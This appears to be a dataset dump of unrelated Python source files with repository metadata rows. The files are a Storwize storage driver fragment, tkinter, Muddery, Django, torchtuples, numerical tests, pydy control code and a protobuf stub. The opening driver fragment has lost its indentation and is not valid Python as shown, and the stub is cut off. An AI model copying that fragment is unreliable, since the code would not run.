elif source_cg and source_vols:
cg_name = 'cg-' + source_cg.id
sources = source_vols
else:
error_msg = _("create_consistencygroup_from_src must be "
"creating from a CG snapshot, or a source CG.")
raise exception.InvalidInput(reason=error_msg)
LOG.debug('create_consistencygroup_from_src: cg_name %(cg_name)s'
' %(sources)s', {'cg_name': cg_name, 'sources': sources})
self._helpers.create_fc_consistgrp(cg_name)
timeout = self.configuration.storwize_svc_flashcopy_timeout
model_update, snapshots_model = (
self._helpers.create_cg_from_source(group,
cg_name,
sources,
volumes,
self._state,
self.configuration,
timeout))
LOG.debug("Leave: create_consistencygroup_from_src.")
return model_update, snapshots_model
def create_cgsnapshot(self, ctxt, cgsnapshot, snapshots):
"""Creates a cgsnapshot."""
# Use cgsnapshot id as cg name
cg_name = 'cg_snap-' + cgsnapshot['id']
# Create new cg as cg_snapshot
self._helpers.create_fc_consistgrp(cg_name)
snapshots = self.db.snapshot_get_all_for_cgsnapshot(
ctxt, cgsnapshot['id'])
timeout = self.configuration.storwize_svc_flashcopy_timeout
model_update, snapshots_model = (
self._helpers.run_consistgrp_snapshots(cg_name,
snapshots,
self._state,
self.configuration,
timeout))
return model_update, snapshots_model
def delete_cgsnapshot(self, context, cgsnapshot, snapshots):
"""Deletes a cgsnapshot."""
cgsnapshot_id = cgsnapshot['id']
cg_name = 'cg_snap-' + cgsnapshot_id
snapshots = self.db.snapshot_get_all_for_cgsnapshot(context,
cgsnapshot_id)
model_update, snapshots_model = (
self._helpers.delete_consistgrp_snapshots(cg_name,
snapshots))
return model_update, snapshots_model
def get_pool(self, volume):
attr = self._helpers.get_vdisk_attributes(volume['name'])
if attr is None:
msg = (_('get_pool: Failed to get attributes for volume '
'%s') % volume['name'])
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
return attr['mdisk_grp_name']
def _update_volume_stats(self):
"""Retrieve stats info from volume group."""
LOG.debug("Updating volume stats.")
data = {}
data['vendor_name'] = 'IBM'
data['driver_version'] = self.VERSION
data['storage_protocol'] = self.protocol
data['pools'] = []
data['multiattach'] = (self.configuration.
storwize_svc_multihostmap_enabled)
backend_name = self.configuration.safe_get('volume_backend_name')
data['volume_backend_name'] = (backend_name or
self._state['system_name'])
data['pools'] = [self._build_pool_stats(pool)
for pool in
self.configuration.storwize_svc_volpool_name]
data['replication'] = self._replication_enabled
data['replication_enabled'] = self._replication_enabled
data['replication_targets'] = self._get_replication_targets(),
self._stats = data
def _build_pool_stats(self, pool):
"""Build pool status"""
QoS_support = True
pool_stats = {}
try:
pool_data = self._helpers.get_pool_attrs(pool)
if pool_data:
easy_tier = pool_data['easy_tier'] in ['on', 'auto']
total_capacity_gb = float(pool_data['capacity']) / units.Gi
free_capacity_gb = float(pool_data['free_capacity']) / units.Gi
allocated_capacity_gb = (float(pool_data['used_capacity']) /
units.Gi)
location_info = ('StorwizeSVCDriver:%(sys_id)s:%(pool)s' %
{'sys_id': self._state['system_id'],
'pool': pool_data['name']})
pool_stats = {
'pool_name': pool_data['name'],
'total_capacity_gb': total_capacity_gb,
'free_capacity_gb': free_capacity_gb,
'allocated_capacity_gb': allocated_capacity_gb,
'compression_support': self._state['compression_enabled'],
'reserved_percentage':
self.configuration.reserved_percentage,
'QoS_support': QoS_support,
'consistencygroup_support': True,
'location_info': location_info,
'easytier_support': easy_tier
}
if self._replication_enabled:
pool_stats.update({
'replication_enabled': self._replication_enabled,
'replication_type': self._supported_replication_types,
'replication_targets': self._get_replication_targets(),
'replication_count': len(self._replication_targets)
})
elif self.replication:
pool_stats.update(self.replication.get_replication_info())
except exception.VolumeBackendAPIException:
msg = _('Failed getting details for pool %s.') % pool
raise exception.VolumeBackendAPIException(data=msg)
return pool_stats
def _get_replication_targets(self):
return [target['backend_id'] for target in self._replication_targets]
def _manage_input_check(self, ref):
"""Verify the input of manage function."""
# Check that the reference is valid
if 'source-name' in ref:
manage_source = ref['source-name']
vdisk = self._helpers.get_vdisk_attributes(manage_source)
elif 'source-id' in ref:
manage_source = ref['source-id']
vdisk = self._helpers.vdisk_by_uid(manage_source)
else:
reason = _('Reference must contain source-id or '
'source-name element.')
raise exception.ManageExistingInvalidReference(existing_ref=ref,
reason=reason)
if vdisk is None:
reason = (_('No vdisk with the UID specified by ref %s.')
% manage_source)
raise exception.ManageExistingInvalidReference(existing_ref=ref,
reason=reason)
return vdisk
| [
"[email protected]"
]
| |
99f0114229968dc89da64649302a272cb8b61dd7 | 19308c971669b903fd1ee9862948e482ab37ce56 | /open_window.py | 74ac07da4a769f11e7c9ef3afdd4005bad3c1154 | [
"MIT"
]
| permissive | crazcalm/learn_tkinter_canvas | 9634716275061d56282c1062a9d58cdac5761869 | b798a6f2217a478e9222bb6eaa2afec3d28a2758 | refs/heads/master | 2021-01-03T04:33:25.134059 | 2020-03-02T01:07:28 | 2020-03-02T01:07:28 | 239,924,031 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 57 | py | import tkinter as tk
window = tk.Tk()
window.mainloop() | [
"[email protected]"
]
| |
12ffc04da6d5d1f0f1212995f33e58915d501bc0 | a964f0f3f93a84d5195042d3c1bb2288e8b62161 | /muddery/server/typeclasses/locked_exit.py | 0451335dae27a4647d7d453f79f9d35569d9f04e | [
"BSD-3-Clause"
]
| permissive | nobodxbodon/muddery | 474433791b75d2f2130e6b758fb3126e2d56230b | 4b4c6c0dc5cc237a5df012a05ed260fad1a793a7 | refs/heads/master | 2023-06-19T19:28:39.252340 | 2021-07-14T15:07:47 | 2021-07-14T15:07:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,770 | py | """
Exits
Exits are connectors between Rooms. An exit always has a destination property
set and has a single command defined on itself with the same name as its key,
for allowing Characters to traverse the exit to its destination.
"""
from muddery.server.statements.statement_handler import STATEMENT_HANDLER
from muddery.server.utils.localized_strings_handler import _
from muddery.server.mappings.typeclass_set import TYPECLASS
class MudderyLockedExit(TYPECLASS("EXIT")):
"""
Characters must unlock these exits to pass it.
The view and commands of locked exits are different from unlocked exits.
"""
typeclass_key = "LOCKED_EXIT"
typeclass_name = _("Locked Exit", "typeclasses")
model_name = "exit_locks"
def after_data_loaded(self):
"""
Set data_info to the object."
"""
super(MudderyLockedExit, self).after_data_loaded()
self.unlock_condition = getattr(self.system, "unlock_condition", "")
self.unlock_verb = getattr(self.system, "unlock_verb", "")
self.locked_desc = getattr(self.system, "locked_desc", "")
self.auto_unlock = getattr(self.system, "auto_unlock", False)
self.unlock_forever = getattr(self.system, "unlock_forever", True)
def at_before_traverse(self, traversing_object):
"""
Called just before an object uses this object to traverse to
another object (i.e. this object is a type of Exit)
Args:
traversing_object (Object): The object traversing us.
Notes:
The target destination should normally be available as
`self.destination`.
If this method returns False/None, the traverse is cancelled
before it is even started.
"""
if not super(MudderyLockedExit, self).at_before_traverse(traversing_object):
return False
# Only can pass exits which have already been unlocked.
if traversing_object.is_exit_unlocked(self.get_data_key()):
if not self.unlock_forever:
# lock the exit again
traversing_object.lock_exit(self)
return True
if self.auto_unlock and self.can_unlock(traversing_object):
# Can unlock the exit automatically.
if self.unlock_forever:
# Unlock it.
traversing_object.unlock_exit(self)
return True
# Show the object's appearance.
appearance = self.get_appearance(traversing_object)
traversing_object.msg({"look_obj": appearance})
return False
def can_unlock(self, caller):
"""
Unlock an exit.
"""
# Only can unlock exits which match there conditions.
return STATEMENT_HANDLER.match_condition(self.unlock_condition, caller, self)
def get_appearance(self, caller):
"""
This is a convenient hook for a 'look'
command to call.
"""
# Get name and description.
if caller.is_exit_unlocked(self.get_data_key()):
# If is unlocked, use common appearance.
return super(MudderyLockedExit, self).get_appearance(caller)
can_unlock = self.can_unlock(caller)
if self.auto_unlock and can_unlock:
if self.unlock_forever:
# Automatically unlock the exit when a character looking at it.
caller.unlock_exit(self)
# If is unlocked, use common appearance.
return super(MudderyLockedExit, self).get_appearance(caller)
cmds = []
if can_unlock:
# show unlock command
verb = self.unlock_verb
if not verb:
verb = _("Unlock")
cmds = [{"name": verb, "cmd": "unlock_exit", "args": self.dbref}]
info = {"dbref": self.dbref,
"name": self.name,
"desc": self.locked_desc,
"cmds": cmds}
return info
def get_available_commands(self, caller):
"""
This returns a list of available commands.
"args" must be a string without ' and ", usually it is self.dbref.
"""
if caller.is_exit_unlocked(self.get_data_key()):
# If is unlocked, use common commands.
return super(MudderyLockedExit, self).get_available_commands(caller)
cmds = []
can_unlock = STATEMENT_HANDLER.match_condition(self.unlock_condition, caller, self)
if can_unlock:
# show unlock command
verb = self.unlock_verb
if not verb:
verb = _("Unlock")
cmds = [{"name": verb, "cmd": "unlock", "args": self.dbref}]
return cmds
| [
"[email protected]"
]
| |
bffdd5605e70c0218027950b2a97ca075262aee1 | 66dead2e38d06f5ca06463d669515876f7eb1771 | /{{cookiecutter.project_name}}/tests/test_server/test_urls.py | abb5b5626aa423ead2e752d00c266d5a31417071 | [
"MIT"
]
| permissive | viktortat/wemake-django-template | 349920117d008e545db162ea11c4235fdf4bf0df | 991bbb8b34ed4b705d38080caa1ffa3893362520 | refs/heads/master | 2020-03-21T10:32:01.894036 | 2018-06-22T09:41:22 | 2018-06-22T09:41:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 844 | py | # -*- coding: utf-8 -*-
def test_admin_unauthorized(client):
"""This test ensures that admin panel requires auth."""
response = client.get('/admin/')
assert response.status_code == 302
def test_admin_authorized(admin_client):
"""This test ensures that admin panel is accessible."""
response = admin_client.get('/admin/')
assert response.status_code == 200
def test_robots_txt(client):
"""This test ensures that `robots.txt` is accessible."""
response = client.get('/robots.txt')
assert response.status_code == 200
assert response.get('Content-Type') == 'text/plain'
def test_humans_txt(client):
"""This test ensures that `humans.txt` is accessible."""
response = client.get('/humans.txt')
assert response.status_code == 200
assert response.get('Content-Type') == 'text/plain'
| [
"[email protected]"
]
| |
d2f8a19b3de851ef689fddf518cebea8c37b91ec | 17fe32a70be82d9fd6c3268b840226b5567c8b29 | /torchtuples/utils.py | bb86e8e2b7557ada3baedd86a27b975d4f3b2644 | [
"MIT",
"BSD-2-Clause"
]
| permissive | georgehc/dksa | dbb7161a75b8206d3d469bb5b966ed7a0f84d86c | bcd9eab6c9ded47f5b166cf1351b06e26e0c8f90 | refs/heads/master | 2023-08-02T06:15:12.472386 | 2021-10-01T17:47:25 | 2021-10-01T17:47:25 | 282,355,975 | 11 | 2 | null | null | null | null | UTF-8 | Python | false | false | 2,855 | py | import time
import random
import numpy as np
import torch
from torchtuples import tuplefy, TupleTree
def make_name_hash(name='', file_ending='.pt'):
year, month, day, hour, minute, second = time.localtime()[:6]
ascii_letters_digits = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
random_hash = ''.join(random.choices(ascii_letters_digits, k=20))
path = f"{name}_{year}-{month}-{day}_{hour}-{minute}-{second}_{random_hash}{file_ending}"
return path
class TimeLogger:
def __init__(self, start=None):
self.start = self.time() if start is None else start
self.prev = self.start
@staticmethod
def time():
return time.time()
def diff(self):
prev, self.prev = (self.prev, self.time())
return self.prev - self.start, self.prev - prev
@staticmethod
def _hms_from_sec(sec):
"""Hours, minutes, seconds."""
m, s = divmod(sec, 60)
h, m = divmod(m, 60)
return h, m, s
@staticmethod
def _hms_str(h, m, s, shorten=True):
"""Hours, minutes, seconds."""
hs = f"{int(h)}h:"
ms = f"{int(m)}m:"
ss = f"{int(s)}s"
if shorten:
if h == 0:
hs = ''
if m == 0:
ms = ''
return f"{hs}{ms}{ss}"
# return f"{int(h)}h:{int(m)}m:{int(s)}s"
def hms_diff(self, shorten=True):
diff_start, diff_prev = self.diff()
hms_start = self._hms_from_sec(diff_start)
hms_prev = self._hms_from_sec(diff_prev)
return self._hms_str(*hms_start, shorten), self._hms_str(*hms_prev, shorten)
def array_or_tensor(tensor, numpy, input):
"""Returs a tensor if numpy is False or input is tensor.
Else it returns numpy array, even if input is a DataLoader.
"""
is_tensor = None
if numpy is False:
is_tensor = True
elif (numpy is True) or is_dl(input):
is_tensor = False
elif not (is_data(input) or is_dl(input)):
raise ValueError(f"Do not understand type of `input`: {type(input)}")
elif tuplefy(input).type() is torch.Tensor:
is_tensor = True
elif tuplefy(input).type() is np.ndarray:
is_tensor = False
else:
raise ValueError("Something wrong")
if is_tensor:
tensor = tuplefy(tensor).to_tensor().val_if_single()
else:
tensor = tuplefy(tensor).to_numpy().val_if_single()
return tensor
def is_data(input):
"""Returns True if `input` is data of type tuple, list, TupleTree, np.array, torch.Tensor."""
datatypes = [np.ndarray, torch.Tensor, tuple, list, TupleTree]
return any([isinstance(input, ct) for ct in datatypes])
def is_dl(input):
"""Returns True if `input` is a DataLoader (inherit from DataLoader)."""
return isinstance(input, torch.utils.data.DataLoader)
| [
"[email protected]"
]
| |
8da334eb44c9ea9052929ef18f09fca3bede6dbe | 65348a4305d10b88c3b4e34eb00d66cf5db6aba7 | /main.py | 225446846dea7cdde0668e429d65088b5214d266 | []
| no_license | lailacampos/Simple-GUI-Kivy | a3671b9dd7f39c6b1efb3c0521753a8a99f32fa8 | 19b0ed9ff7ad4039d842b2d4223a7d79ffb56dc2 | refs/heads/main | 2023-08-22T03:08:48.696503 | 2021-09-22T02:19:27 | 2021-09-22T02:19:27 | 407,191,579 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 773 | py | # Useful links:
# https://kivy.org/doc/stable/guide/basic.html#quickstart
# https://kivy.org/doc/stable/api-kivy.app.html
# https://youtu.be/YDp73WjNISc
from kivy.app import App
from kivy.uix.label import Label
# The MyMainApp() class is derived from the App() class of the kivy.app repository.
# The App() class is the base for creating Kivy applications.
# Kivy requires that the class inherits from the App class
class MyApp(App):
# The build() method initializes the application and returns a widget that will be used as [root] and added to the window.
# This method doesn't need to be called,: the App().run() will do that.
def build(self):
label = Label(text="Hello World")
return label
if __name__ == "__main__":
MyApp().run()
| [
"[email protected]"
]
| |
4d3122b6a5a76c30a85ea82eef87b31bb9ff3d7f | 9bcb5032d27ca321f489c035f7d46019ffdf4b85 | /numericalFunctions/ptwXY/Python/Test/Flat/binaryMath/flatMath.py | 46871d9e915089e2d32588a84b4438372de42ec5 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
]
| permissive | LLNL/gidiplus | 128ef4d4acbcb264e31794a535cd95e8c77d8a96 | e1c6f0e4de51bc4d7616c5c4676b9818c4b9817c | refs/heads/master | 2023-08-31T06:21:14.519577 | 2023-02-13T18:35:20 | 2023-02-13T18:35:20 | 187,251,526 | 10 | 3 | NOASSERTION | 2021-12-23T00:28:07 | 2019-05-17T16:48:24 | C++ | UTF-8 | Python | false | false | 5,300 | py | # <<BEGIN-copyright>>
# Copyright 2019, Lawrence Livermore National Security, LLC.
# See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: MIT
# <<END-copyright>>
import os
from numericalFunctions import pointwiseXY_C
accuracy = 1e-2
biSectionMax = 0.
if( 'CHECKOPTIONS' in os.environ ) :
options = os.environ['CHECKOPTIONS'].split( )
if( '-e' in options ) : print( __file__ )
CPATH = '../../../../Test/Flat/binaryMath'
os.system( 'cd %s; make -s clean; ./flatMath -v > v' % CPATH )
def skipBlankLines( ls ) :
i = 0
for i, l in enumerate( ls ) :
if( l.strip( ) != '' ) : break
ls = ls[i:]
if( ( len( ls ) == 1 ) and ( ls[0].strip( ) == '' ) ) : ls = []
return( ls )
def getIntegerValue( name, ls ) :
s = "# %s = " % name
n = len( s )
if( ls[0][:n] != s ) : raise Exception( '%s: missing %s info: "%s"' % ( __file__, name, ls[0][:-1] ) )
value = int( ls[0].split( '=' )[1] )
return( ls[1:], value )
def getDoubleValue( name, ls ) :
s = "# %s = " % name
n = len( s )
if( ls[0][:n] != s ) : raise Exception( '%s: missing %s info: "%s"' % ( __file__, name, ls[0][:-1] ) )
value = float( ls[0].split( '=' )[1] )
return( ls[1:], value )
def compareValues( label, i, v1, v2 ) :
sv1, sv2 = '%.12e' % v1, '%.12e' % v2
sv1, sv2 = '%.7e' % float( sv1 ), '%.7e' % float( sv2 )
if( sv1 != sv2 ) : print( '<%s> <%s>' % ( sv1, sv2 ) )
if( sv1 != sv2 ) : raise Exception( '%s: values %e and %e diff by %e at %d for label = %s' % ( __file__, v1, v2, v2 - v1, i, label ) )
def getXYData( ls, biSectionMax, accuracy ) :
ls, length = getIntegerValue( 'length', ls )
data = [ list( map( float, ls[i].split( ) ) ) for i in range( length ) ]
data = pointwiseXY_C.pointwiseXY_C( data, initialSize = len( data ), overflowSize = 10, biSectionMax = biSectionMax, accuracy = accuracy, safeDivide = True, interpolation = "flat" )
ls = ls[length:]
ls = skipBlankLines( ls )
return( ls, data )
def getCommand( ls ) :
s = ls[0].split( )
if( len( s ) != 2 ) : raise Exception( 'Invalid command = "%s"' % ls[0][:-1] )
if( s[0] != "#" ) : raise Exception( 'Invalid command = "%s"' % ls[0][:-1] )
return( ls[1:], s[1] )
def compareXYs( XYs1, XYs2, label ) :
if( len( XYs1 ) != len( XYs2 ) ) : raise Exception( 'for %s: len( XYs1 ) = %s != len( XYs2 ) = %s' % ( label, len( XYs1 ), len( XYs2 ) ) )
for i, xy in enumerate( XYs1 ) :
compareValues( "x division " + label, count, xy[0], XYs2[i][0] )
compareValues( "y division " + label, count, xy[1], XYs2[i][1] )
def mathParse( count, ls ) :
ls, command = getCommand( ls )
if( command == 'double' ) :
ls = doubleCheck( count, ls )
elif( command == 'all_double' ) :
ls = allDoubleCheck( count, ls )
elif( command == 'binary_add_sub' ) :
ls = binaryAddSubCheck( count, ls )
elif( command == 'binary_mul_div' ) :
ls = binaryMulDivCheck( count, ls )
else :
raise Exception( 'Invalid command = "%s"' % command )
return( ls )
def doubleCheck( count, ls ) :
ls, d = getDoubleValue( 'double', ls )
ls, o = getCommand( ls )
if( o not in '+-=*/\\' ) : raise Exception( 'Unknown operator "%s"' % o )
ls, XYs = getXYData( ls, biSectionMax, accuracy )
ls, resultsC = getXYData( ls, biSectionMax, accuracy )
if( o == '+' ) : results = XYs + d
elif( o == '-' ) : results = XYs - d
elif( o == '=' ) : results = d - XYs
elif( o == '*' ) : results = XYs * d
elif( o == '/' ) : results = XYs / d
elif( o == '\\' ) : results = d / XYs
compareXYs( resultsC, results, "doubleCheck %s" % o )
return( ls )
def allDoubleCheck( count, ls ) :
ls, d = getDoubleValue( 'double', ls )
ls, XYs = getXYData( ls, biSectionMax, accuracy )
ls, resultsC = getXYData( ls, biSectionMax, accuracy )
results = ( ( d * ( XYs + d ) ) - d ) / d
results = ( ( ( d * results ) + d ) / d ) - d
compareXYs( resultsC, results, "allDoubleCheck" )
return( ls )
def binaryAddSubCheck( count, ls ) :
ls, XYs1 = getXYData( ls, biSectionMax, accuracy )
ls, XYs2 = getXYData( ls, biSectionMax, accuracy )
ls, resultsC = getXYData( ls, biSectionMax, accuracy )
results = XYs1 + XYs2
compareXYs( resultsC, results, "binaryAddSubCheck" )
ls, dummy = getXYData( ls, biSectionMax, accuracy )
ls, resultsC = getXYData( ls, biSectionMax, accuracy )
results = results - XYs2
compareXYs( resultsC, results, "binaryAddSubCheck" )
return( ls )
def binaryMulDivCheck( count, ls ) :
ls, XYs1 = getXYData( ls, biSectionMax, accuracy )
ls, XYs2 = getXYData( ls, biSectionMax, accuracy )
ls, resultsC = getXYData( ls, biSectionMax, accuracy )
results = XYs1 * XYs2
compareXYs( resultsC, results, "binaryMulDivCheck" )
ls, dummy = getXYData( ls, biSectionMax, accuracy )
ls, resultsC = getXYData( ls, biSectionMax, accuracy )
results = results / XYs2
compareXYs( resultsC, results, "binaryMulDivCheck" )
return( ls )
f = open( os.path.join( CPATH, 'v' ) )
ls = f.readlines( )
f.close( )
ls, accuracy = getDoubleValue( 'accuracy', ls )
count = 0
while( len( ls ) ) :
count += 1
ls = mathParse( count, ls )
| [
"[email protected]"
]
| |
718209cd4e9b8129270bfd7cfce002ecbefdd48f | e49b654d3db99773390c5b9686df9c99fbf92b2a | /linked_lists/remove_nth_from_end.py | df9193a1a375cfc8ab394f07106bc5c85074e045 | []
| no_license | hao89/diary_of_programming_puzzles | 467e8264d0ad38768ba5ac3cfb45301293d79943 | 0e05d3716f28075f99bbd7b433d16a383209e57c | refs/heads/master | 2021-01-16T00:49:38.956102 | 2015-08-25T13:44:53 | 2015-08-25T13:44:53 | 41,692,587 | 1 | 0 | null | 2015-08-31T18:20:38 | 2015-08-31T18:20:36 | Python | UTF-8 | Python | false | false | 1,207 | py | """
Given a linked list, remove the nth node from the end of the list and return
its head.
For example,
Given the linked list: 1->2->3->4->5, and n = 2.
After removing the second node from the end, the linked list becomes
1->2->3->5.
Note:
Given n will always be valid.
Try to do this in one pass
"""
# @param head a reference to the head of the list
# @param n the position (from the tail) of the node that should be deleted
# @return a new linked list with the required node deleted
def remove_nth_from_end(head, n):
n_behind_node = head
faster_node = head
before_behind_node = head
for i in xrange(0, n):
faster_node = faster_node.next
while faster_node:
faster_node = faster_node.next
before_behind_node = n_behind_node
n_behind_node = n_behind_node.next
# handle situation where there is only one node in the linked list or the
# head is the one being removed
if before_behind_node == n_behind_node:
if not n_behind_node.next:
head = None
else:
head = n_behind_node.next
else:
before_behind_node.next = before_behind_node.next.next
return head
| [
"[email protected]"
]
| |
ae5fa2cf162831595429963b02bdc5cfc7fb8baf | 7e9daf6a2a3ebfb969e793f92afc0dc5f1c2fc35 | /venv/bin/pip | f925d1739221b77a3093bdff330b2aded4106b0b | []
| no_license | NARESHSWAMI199/5-Star-On-Hacker-Rank-Python | e43ce5cb3429d2a683c37e6f4ba6440d073d47c2 | 51f245d1d0966de21ddf861b22fe3379e7c8a0a7 | refs/heads/main | 2023-02-25T03:05:25.330205 | 2021-01-19T13:49:27 | 2021-01-19T13:49:27 | 325,296,957 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 256 | #!/home/naresh/Documents/django/hrank/venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from pip._internal.cli.main import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"[email protected]"
]
| ||
105ea887fde8976e0371b1515151cd874df939cd | 39dc5f1ffa71ad5e7aab5e92bb118bddf3ddae44 | /ats/users/urls.py | 63a22a7046e3bb8a9decd34439b0530732abd1fc | [
"MIT"
]
| permissive | MahmoudFarid/ats | 14422a136c574d33745ac874e02e2211cce8bf14 | 1f882168cba2f34451cbb9bba1e37ce93ef0c465 | refs/heads/master | 2023-08-28T09:08:49.860168 | 2020-07-28T20:35:00 | 2020-07-28T20:35:00 | 278,744,279 | 0 | 0 | MIT | 2021-11-12T15:22:34 | 2020-07-10T22:23:07 | Python | UTF-8 | Python | false | false | 358 | py | from django.urls import path
from ats.users.views import (
user_detail_view,
user_redirect_view,
user_update_view,
)
app_name = "users"
urlpatterns = [
path("~redirect/", view=user_redirect_view, name="redirect"),
path("~update/", view=user_update_view, name="update"),
path("<str:email>/", view=user_detail_view, name="detail"),
]
| [
"[email protected]"
]
| |
21c2ff1c781282e130ce340af0483a9cecda2ee7 | ced2fe3abf39bf14519feb809f5cd4e56c828b46 | /notebooks/solution/control.py | 1225ebf7d93259de25bc077dcf008f6d1f42287a | [
"CC-BY-4.0"
]
| permissive | nanounanue/pydy-tutorial-pycon-2014 | f68fb8bb967f6229743151c023b0b6da50d46f24 | 9a111ada7478a16c41ab75253e631a400febb083 | refs/heads/master | 2020-12-25T16:25:38.826055 | 2014-06-20T14:54:37 | 2014-06-20T14:54:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,454 | py | #!/usr/bin/env python
# Controller Design
from numpy import zeros, matrix, eye, dot, asarray
from numpy.linalg import inv
from scipy.linalg import solve_continuous_are
from .utils import controllable
from .visualization import *
equilibrium_point = zeros(len(coordinates + speeds))
equilibrium_dict = dict(zip(coordinates + speeds, equilibrium_point))
parameter_dict = dict(zip(constants, numerical_constants))
linear_state_matrix, linear_input_matrix, inputs = kane.linearize()
f_A_lin = linear_state_matrix.subs(parameter_dict).subs(equilibrium_dict)
f_B_lin = linear_input_matrix.subs(parameter_dict).subs(equilibrium_dict)
m_mat = mass_matrix.subs(parameter_dict).subs(equilibrium_dict)
A = matrix(m_mat.inv() * f_A_lin).astype(float)
B = matrix(m_mat.inv() * f_B_lin).astype(float)
assert controllable(A, B)
Q = matrix(eye(6))
R = matrix(eye(3))
S = solve_continuous_are(A, B, Q, R)
K = inv(R) * B.T * S
# This is an annoying little issue. We specified the order of things when
# creating the rhs function, but the linearize function returns the F_B
# matrix in the order corresponding to whatever order it finds the joint
# torques. This would also screw things up if we specified a different
# ordering of the coordinates and speeds as the standard kana._q + kane._u
K = K[[0, 2, 1], :]
def controller(x, t):
return -asarray(dot(K, x)).flatten()
args['specified'] = controller
y = odeint(right_hand_side, x0, t, args=(args,))
| [
"[email protected]"
]
| |
a18b2132c6645e3c3e8102f1e3acf82ca7ee3c73 | bc441bb06b8948288f110af63feda4e798f30225 | /tuna_service_sdk/model/easy_flow/task_pb2.pyi | 99c3f43d6dca4676b4ba29fcf6e453c206047933 | [
"Apache-2.0"
]
| permissive | easyopsapis/easyops-api-python | 23204f8846a332c30f5f3ff627bf220940137b6b | adf6e3bad33fa6266b5fa0a449dd4ac42f8447d0 | refs/heads/master | 2020-06-26T23:38:27.308803 | 2020-06-16T07:25:41 | 2020-06-16T07:25:41 | 199,773,131 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,667 | pyi | # @generated by generate_proto_mypy_stubs.py. Do not edit!
import sys
from google.protobuf.descriptor import (
Descriptor as google___protobuf___descriptor___Descriptor,
)
from google.protobuf.internal.containers import (
RepeatedCompositeFieldContainer as google___protobuf___internal___containers___RepeatedCompositeFieldContainer,
RepeatedScalarFieldContainer as google___protobuf___internal___containers___RepeatedScalarFieldContainer,
)
from google.protobuf.message import (
Message as google___protobuf___message___Message,
)
from google.protobuf.struct_pb2 import (
Struct as google___protobuf___struct_pb2___Struct,
)
from tuna_service_sdk.model.easy_flow.deploy_target_pb2 import (
DeployTarget as tuna_service_sdk___model___easy_flow___deploy_target_pb2___DeployTarget,
)
from tuna_service_sdk.model.easy_flow.package_info_pb2 import (
PackageInfo as tuna_service_sdk___model___easy_flow___package_info_pb2___PackageInfo,
)
from tuna_service_sdk.model.easy_flow.target_info_pb2 import (
TargetInfo as tuna_service_sdk___model___easy_flow___target_info_pb2___TargetInfo,
)
from typing import (
Iterable as typing___Iterable,
Optional as typing___Optional,
Text as typing___Text,
Union as typing___Union,
)
from typing_extensions import (
Literal as typing_extensions___Literal,
)
builtin___bool = bool
builtin___bytes = bytes
builtin___float = float
builtin___int = int
if sys.version_info < (3,):
builtin___buffer = buffer
builtin___unicode = unicode
class Task(google___protobuf___message___Message):
DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...
class ConfigList(google___protobuf___message___Message):
DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...
class Configs(google___protobuf___message___Message):
DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...
class Items(google___protobuf___message___Message):
DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...
name = ... # type: typing___Text
path = ... # type: typing___Text
def __init__(self,
*,
name : typing___Optional[typing___Text] = None,
path : typing___Optional[typing___Text] = None,
) -> None: ...
if sys.version_info >= (3,):
@classmethod
def FromString(cls, s: builtin___bytes) -> Task.ConfigList.Configs.Items: ...
else:
@classmethod
def FromString(cls, s: typing___Union[builtin___bytes, builtin___buffer, builtin___unicode]) -> Task.ConfigList.Configs.Items: ...
def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def ClearField(self, field_name: typing_extensions___Literal[u"name",b"name",u"path",b"path"]) -> None: ...
packageId = ... # type: typing___Text
installPath = ... # type: typing___Text
@property
def items(self) -> google___protobuf___internal___containers___RepeatedCompositeFieldContainer[Task.ConfigList.Configs.Items]: ...
def __init__(self,
*,
packageId : typing___Optional[typing___Text] = None,
items : typing___Optional[typing___Iterable[Task.ConfigList.Configs.Items]] = None,
installPath : typing___Optional[typing___Text] = None,
) -> None: ...
if sys.version_info >= (3,):
@classmethod
def FromString(cls, s: builtin___bytes) -> Task.ConfigList.Configs: ...
else:
@classmethod
def FromString(cls, s: typing___Union[builtin___bytes, builtin___buffer, builtin___unicode]) -> Task.ConfigList.Configs: ...
def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def ClearField(self, field_name: typing_extensions___Literal[u"installPath",b"installPath",u"items",b"items",u"packageId",b"packageId"]) -> None: ...
hosts = ... # type: google___protobuf___internal___containers___RepeatedScalarFieldContainer[typing___Text]
@property
def configs(self) -> google___protobuf___internal___containers___RepeatedCompositeFieldContainer[Task.ConfigList.Configs]: ...
def __init__(self,
*,
hosts : typing___Optional[typing___Iterable[typing___Text]] = None,
configs : typing___Optional[typing___Iterable[Task.ConfigList.Configs]] = None,
) -> None: ...
if sys.version_info >= (3,):
@classmethod
def FromString(cls, s: builtin___bytes) -> Task.ConfigList: ...
else:
@classmethod
def FromString(cls, s: typing___Union[builtin___bytes, builtin___buffer, builtin___unicode]) -> Task.ConfigList: ...
def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def ClearField(self, field_name: typing_extensions___Literal[u"configs",b"configs",u"hosts",b"hosts"]) -> None: ...
class ConfigDiff(google___protobuf___message___Message):
DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...
class Detail(google___protobuf___message___Message):
DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...
class Items(google___protobuf___message___Message):
